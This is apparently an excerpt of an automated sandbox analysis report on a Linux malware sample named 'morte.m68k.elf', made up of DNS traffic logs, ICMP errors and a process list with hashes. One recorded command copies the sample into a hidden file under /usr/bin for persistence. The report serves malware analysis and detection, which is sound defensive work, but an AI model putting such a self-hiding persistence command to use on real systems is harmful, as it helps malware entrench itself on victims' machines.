                                                            Jul 6, 2025 08:13:21.388070107 CEST3775353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:21.473882914 CEST53377538.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:21.475054026 CEST3288853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:21.560895920 CEST53328888.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:21.561675072 CEST5267853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:21.648142099 CEST53526788.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:21.649508953 CEST3368653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:21.735454082 CEST53336868.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:35.389496088 CEST4311053192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:35.474920988 CEST53431108.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:35.476476908 CEST5165053192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:35.562000990 CEST53516508.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:35.562808990 CEST4538653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:35.648606062 CEST53453868.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:35.649583101 CEST4326753192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:35.735261917 CEST53432678.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:35.736156940 CEST5326053192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:35.821943998 CEST53532608.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:49.121637106 CEST5555053192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:49.207500935 CEST53555508.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:49.209078074 CEST4520953192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:49.294944048 CEST53452098.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:49.296214104 CEST4999553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:49.381907940 CEST53499958.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:49.383388042 CEST4341853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:49.469122887 CEST53434188.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:13:49.470480919 CEST5313353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:13:49.556329966 CEST53531338.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:02.716665983 CEST4442153192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:02.802572012 CEST53444218.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:02.803256989 CEST4066853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:02.888670921 CEST53406688.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:02.889381886 CEST3405353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:02.974833012 CEST53340538.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:02.975414038 CEST5522353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:03.061444044 CEST53552238.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:03.061965942 CEST4434753192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:03.147597075 CEST53443478.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:16.383450031 CEST5830653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:16.468980074 CEST53583068.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:16.470083952 CEST4050853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:16.556288958 CEST53405088.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:16.557069063 CEST3848553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:16.642971039 CEST53384858.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:16.643788099 CEST5391653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:16.729557037 CEST53539168.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:16.730823994 CEST4810553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:16.816535950 CEST53481058.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:29.766387939 CEST3489953192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:29.852514029 CEST53348998.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:29.853967905 CEST3966353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:29.939434052 CEST53396638.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:29.940860987 CEST3895553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:30.026381969 CEST53389558.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:30.027741909 CEST5431453192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:30.113202095 CEST53543148.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:30.114444971 CEST4138753192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:30.200620890 CEST53413878.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:43.164274931 CEST3677053192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:43.249952078 CEST53367708.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:43.251374006 CEST3433753192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:43.337857962 CEST53343378.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:43.338990927 CEST4624453192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:43.424767017 CEST53462448.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:43.426299095 CEST5156853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:43.512186050 CEST53515688.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:43.513405085 CEST6000353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:43.598851919 CEST53600038.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:56.579605103 CEST3835453192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:56.665901899 CEST53383548.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:56.667258024 CEST5436153192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:56.753030062 CEST53543618.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:56.753988981 CEST5224553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:56.839896917 CEST53522458.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:56.841397047 CEST5419853192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:56.926721096 CEST53541988.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:14:56.928102016 CEST5744553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:14:57.013566971 CEST53574458.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:09.961832047 CEST5985653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:10.047307014 CEST53598568.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:10.047866106 CEST3733453192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:10.133253098 CEST53373348.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:10.133829117 CEST3919653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:10.219244003 CEST53391968.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:10.220024109 CEST3328953192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:10.305965900 CEST53332898.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:10.306509018 CEST3327753192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:10.392043114 CEST53332778.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:24.065314054 CEST4535653192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:24.151284933 CEST53453568.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:24.152741909 CEST5941153192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:24.238432884 CEST53594118.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:24.239921093 CEST5180353192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:24.325480938 CEST53518038.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:24.327040911 CEST4986553192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:24.412851095 CEST53498658.8.8.8192.168.2.14
                                                            Jul 6, 2025 08:15:24.414628983 CEST4422153192.168.2.148.8.8.8
                                                            Jul 6, 2025 08:15:24.500478029 CEST53442218.8.8.8192.168.2.14
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Jul 6, 2025 08:13:05.348021984 CEST192.168.2.14192.168.2.1827a(Port unreachable)Destination Unreachable
                                                            Jul 6, 2025 08:14:25.358831882 CEST192.168.2.14192.168.2.1827a(Port unreachable)Destination Unreachable

                                                            System Behavior

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:/tmp/morte.m68k.elf
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/bin/sh
                                                            Arguments:sh -c "cp /tmp/morte.m68k.elf /usr/bin/.sh"
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/bin/sh
                                                            Arguments:-
                                                            File size:129816 bytes
                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                            Start time (UTC):06:12:55
                                                            Start date (UTC):06/07/2025
                                                            Path:/usr/bin/cp
                                                            Arguments:cp /tmp/morte.m68k.elf /usr/bin/.sh
                                                            File size:153976 bytes
                                                            MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                            Start time (UTC):06:12:56
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:56
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:12:56
                                                            Start date (UTC):06/07/2025
                                                            Path:/tmp/morte.m68k.elf
                                                            Arguments:-
                                                            File size:4463432 bytes
                                                            MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                            Start time (UTC):06:13:02
                                                            Start date (UTC):06/07/2025
                                                            Path:/usr/libexec/gvfsd-fuse
                                                            Arguments:-
                                                            File size:47632 bytes
                                                            MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                                            Start time (UTC):06:13:02
                                                            Start date (UTC):06/07/2025
                                                            Path:/bin/fusermount
                                                            Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                                            File size:39144 bytes
                                                            MD5 hash:576a1b135c82bdcbc97a91acea900566

                                                            Start time (UTC):06:13:02
                                                            Start date (UTC):06/07/2025
                                                            Path:/usr/bin/python3.8
                                                            Arguments:-
                                                            File size:5490352 bytes
                                                            MD5 hash:69f442c3e33b5f9a66b722c29ad89435

                                                            Start time (UTC):06:13:02
                                                            Start date (UTC):06/07/2025
                                                            Path:/usr/bin/gdbus
                                                            Arguments:/usr/bin/gdbus call -e -d org.gnome.SessionManager -o /org/gnome/SessionManager -m org.gnome.SessionManager.IsSessionRunning
                                                            File size:51592 bytes
                                                            MD5 hash:1deb65de9f7f468799d3bfde20118a9b